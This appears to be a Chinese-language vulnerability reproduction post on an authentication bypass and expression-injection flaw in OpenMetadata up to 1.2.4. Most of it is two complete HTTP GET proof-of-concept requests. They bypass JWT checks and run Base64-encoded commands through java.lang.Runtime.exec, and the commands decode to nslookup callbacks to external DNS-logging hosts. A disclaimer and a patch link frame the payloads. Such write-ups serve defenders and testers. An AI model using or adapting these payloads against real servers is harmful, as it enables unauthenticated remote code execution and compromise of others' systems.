0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和发布者无关,需自行负责!

0x01漏洞介绍

OpenMetadata是一个统一的发现、可观察和治理平台,由中央元数据存储库、深入的沿袭和无缝团队协作提供支持。

OpenMetadata存在安全漏洞,该漏洞源于当请求的路径包含任何排除的端点时,过滤器将返回而不验证 JWT。

0x02影响版本

OpenMetadata==< 1.2.4

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (GET)

漏洞复现

GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgY29hdnJmdGJscTYyY2syajRiaWdkaHV0a2J0ZDFtd2Q1Lm9hc3Qub25saW5l%22))) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Accept-Encoding: gzip, deflate

测试dnslog回显,执行内容base64编码

GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgNzY0N2pxLmRuc2xvZy5jbg==%22))) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Accept-Encoding: gzip, deflate

3.nuclei工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/open-metadata/OpenMetadata/releases/tag/1.2.4-release